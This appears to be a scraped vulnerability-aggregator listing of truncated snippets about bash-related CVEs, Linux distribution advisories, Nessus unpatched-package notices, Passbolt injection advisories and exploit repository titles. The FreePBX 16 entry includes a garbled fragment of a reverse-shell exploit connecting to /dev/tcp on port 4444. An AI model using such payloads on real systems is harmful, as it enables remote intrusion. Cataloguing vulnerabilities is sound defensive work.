Exploit for Code Injection in Rejetto Http_File_Server

CVE-2024-23692-EXP bash bash CVE-2024-...

OPENSUSE-SU-2024:10106-1 bash-4.4-92.1 on GA media

These are all security issues fixed in the bash-4.4-92.1 package on the GA media of openSUSE Tumbleweed...

OPENSUSE-SU-2024:13939-1 python-tqdm-bash-completion-4.66.4-1.1 on GA media

These are all security issues fixed in the python-tqdm-bash-completion-4.66.4-1.1 package on the GA media of openSUSE Tumbleweed...

bash bug fix and enhancement update

An update is available for bash. This update affects Rocky Linux 8. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list For detailed information on changes in this release, see the Rocky Linux 8.10...

curl: Denial of Service in curl Request - HTTP headers eat all memory

Vulnerability description not provided...

Exploit for OS Command Injection in Php

PHP RCE PoC CVE-2024-4577: Argument Injection in PHP-CGI...

Exploit for Improper Initialization in Linux Linux_Kernel

CVE-2022-0847-dirty-pipe-checker Bash script to check for CVE-...

RHEL 5 : bash (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 5 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - bash: Specially crafted SHELLOPTS+PS4 variables allows command substitution CVE-2016-7543 - The expansion...

RHEL 7 : bash (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 7 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - bash: when effective UID is not equal to its real UID the saved UID is not dropped CVE-2019-18276 - A...

FreePBX 16 - Remote Code Execution (Authenticated) Exploit

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; echo $response =...

Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Checkpoint Quantum_Spark_Firmware

CVE-2024-24919 Checker A simple bash script to check for the...

Exploit for CVE-2024-2961

iconvfix Bash script to patch for CVE-2024-...

Exploit for CVE-2024-4956

CVE-2024-4956-Sonatype-Nexus-Repository-Manager Sonatype Ne...

CVE-2021-47452 netfilter: nf_tables: skip netdev events generated on netns removal

In the Linux kernel, the following vulnerability has been resolved: netfilter: nftables: skip netdev events generated on netns removal syzbot reported following harmless WARN: WARNING: CPU: 1 PID: 2648 at net/netfilter/core.c:468 nftnetdevunregisterhooks net/netfilter/nftablesapi.c:230 inline...

GHSA-CV5C-2QV5-W2M2 Passbolt Api Remote code execution

Passbolt provides a way for system administrators to generate a PGP key for the server during installation. The wizard requests a username, an e-mail address and an optional comment. No escaping or verification is done by Passbolt, effectively allowing a user to inject bash code. The impact is ve...

Passbolt Api Remote code execution

Passbolt provides a way for system administrators to generate a PGP key for the server during installation. The wizard requests a username, an e-mail address and an optional comment. No escaping or verification is done by Passbolt, effectively allowing a user to inject bash code. The impact is ve...

PT-2024-40250 · Passbolt · Passbolt

Name of the Vulnerable Software and Affected Versions: Passbolt affected versions not specified Description: The issue allows a user to inject bash code during the installation stage of Passbolt, as the system does not perform escaping or verification on the input provided for the username, e-mai...

CVE-2023-46870

The CVE concerns Nordic Semiconductor nRF Sniffer for Bluetooth LE (versions 3.0.0–4.1.1). A permissions misconfiguration in extcap/nrf_sniffer_ble.py, extcap/nrf_sniffer_ble.sh, and extcap/SnifferAPI/*.py can allow code execution by modifying these scripts. Public details in multiple sources con...

RHEL 8 : bash (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 8 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - bash: BASHCMD is writable in restricted bash shells CVE-2019-9924 Note that Nessus has not tested for this issue bu...

RHEL 5 : bash (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 5 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - bash: Specially crafted SHELLOPTS+PS4 variables allows command substitution CVE-2016-7543 - bash: when...